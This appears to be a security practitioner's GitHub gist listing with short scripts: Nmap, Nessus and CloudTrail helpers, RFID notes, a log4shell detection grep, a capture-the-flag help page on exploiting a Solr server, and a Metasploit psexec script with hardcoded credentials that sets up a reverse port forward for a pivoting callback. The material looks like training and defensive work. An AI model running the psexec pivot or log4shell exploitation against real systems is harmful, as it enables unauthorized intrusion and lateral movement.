Joshua Wright joswr1ght

@joswr1ght
joswr1ght / nmap-top-tcpport-commadsep-list.sh
Created Jul 24, 2022
Create a list of top Nmap TCP ports, converted to comma-separated format
View nmap-top-tcpport-commadsep-list.sh
grep -v '^#' /usr/local/Cellar/nmap/7.92/share/nmap/nmap-services | grep '/tcp' | sort -r -k3 | awk '{print $2}' | sed 's,/tcp,,' | head -40 | sort -n | gsed -z 's/\n/,/g;s/,$/\n/'
View mlatitlecase.py
#!/usr/bin/env python3
# MLA Style: Capitalization
#
# ref: https://libguides.pvcc.edu/citationstyles/mla9-capitalization
#
# In a title or a subtitle, capitalize the first word, the last word, and all
# principal words, including those that follow hyphens in compound terms.
# Therefore, capitalize the following parts of speech:
#
# Nouns (e.g., flowers, as in The Flowers of Europe)
@joswr1ght
joswr1ght / extract-nessus-report-data.py
Created Apr 14, 2022
Read Nessus CSV report, extract records of interest
View extract-nessus-report-data.py
#!/usr/bin/env python3
import csv
import sys
import os
if (len(sys.argv) == 1):
    sys.stderr.write(
        f"Usage: {os.path.basename(sys.argv[0])} <nessus-csv-file>\n")
    sys.exit(1)
@joswr1ght
joswr1ght / test_badattributes.py
Created Mar 18, 2022
Test one or more Asciidoc .adoc files for missing document attribute definitions
View test_badattributes.py
#!/usr/bin/env python3
# Using one or more adoc files, build a list of all document attributes,
# then search for typo'd or undefined references to the attributes.
#
# 2022-03-18
# Copyright (c) 2022 Joshua Wright <jwright@hasborg.com>
# LICENSE: GPL 3.0
import sys
import os
@joswr1ght
joswr1ght / mifare-desfire-aid-mapping.md
Last active Feb 24, 2022
MIFARE DESFire AID Mapping
View mifare-desfire-aid-mapping.md

MIFARE DESFire AID Mapping

Entered here for posterity and so I don't have to search for this ever again.

The MIFARE DESFire Application Identifier (AID) is a 3-byte value that represents the application ID used for RFID functionality that holds files. This can be a MIFARE Classic AID structure (2 bytes) adapted for use with the expanded MIFARE DESFire AID (3 bytes).

https://www.nxp.com/docs/en/application-note/AN10787.pdf

A 2-byte MIFARE Classic AID adapted to MIFARE DESFire uses a leading nibble of 0xf and a trailing nibble of 0x0 - 0xf. The middle 2 bytes are the MIFARE Classic AID. For example, 0x7009 is the Timelox AB MIFARE Classic AID; 0xf7009x (where x is the trailing nibble) is the adapted AID for MIFARE DESFire.

@joswr1ght
joswr1ght / logshell-search.sh
Created Dec 20, 2021
Search for log4shell attack patterns
View logshell-search.sh
#!/bin/sh
# Specify a starting directory as the first command-line argument to search for
# log4shell-style attack patterns.
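# The starting directory is quoted so paths with spaces work; it defaults to
# the current directory when no argument is given.
grep -E -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/.+' "${1:-.}"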
@joswr1ght
joswr1ght / HELP.md
Last active Jan 5, 2022
Log4Jack Bonus Help
View HELP.md

Yule Log4Jack Help

Hi, Josh Wright here. I'm the technical director for the Holiday Hack Challenge. We don't normally break the 4th wall like this, but we think this Log4j vulnerability calls for special measures to give you the information you need to assess, identify, and mitigate this vulnerability.

In this challenge, Icky McGoop asks for your help in exploiting a Java Solr server at http://solrpower.kringlecastle.com:8983. This server is vulnerable to the Log4shell vulnerability. Your goal is to exploit the server and get a

@joswr1ght
joswr1ght / ctsummarize.sh
Created Nov 10, 2021
ctsummarize: Create Multiple Output Files From CloudTrail Activity for Analysis
View ctsummarize.sh
#!/bin/bash
REQUIREDUTILS="jq zcat mktemp sort uniq rm"
# Run program and test exit status to ensure success
function runtst {
    "$@"
    local status=$?
    if (( status != 0 )); then
        echo "error running command" >&2
@joswr1ght
joswr1ght / youwillnotbestmejq.sh
Last active Jul 29, 2021
Get Name and IP address from EC2 instances
View youwillnotbestmejq.sh
$ aws --profile falsimentis --region us-west-1 ec2 describe-instances | jq -jr '.Reservations[] | .Instances[] | "\"", (.PublicIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
"54.183.200.32":"Web Server 3",
"13.56.160.248":"VPC NAT Backup",
"13.57.148.101":"VPC NAT",
"54.153.36.229":"Dev Webserver",
"52.52.159.114":"Web Server 2",
"null":"DB Server 1",
"54.241.78.206":"Web Server 1",
"54.219.245.27":"Web Server 4",
$ cat ec2-describe-instances.json | jq -jr '.Reservations[] | .Instances[] | "\"", (.NetworkInterfaces[] | .PrivateIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
@joswr1ght
joswr1ght / intermediate-forwarder.met
Created May 21, 2021
Setup Intermediate Forwarder for Metasploit Callback
View intermediate-forwarder.met
use exploit/windows/smb/psexec
set RHOST 10.10.10.10
set SMBUSER falken
set SMBPASS joshua
set LHOST tap0
show options
exploit
portfwd add -R -L 127.0.0.1 -l 4444 -p 4444
bg
route add 10.10.10.20/32 1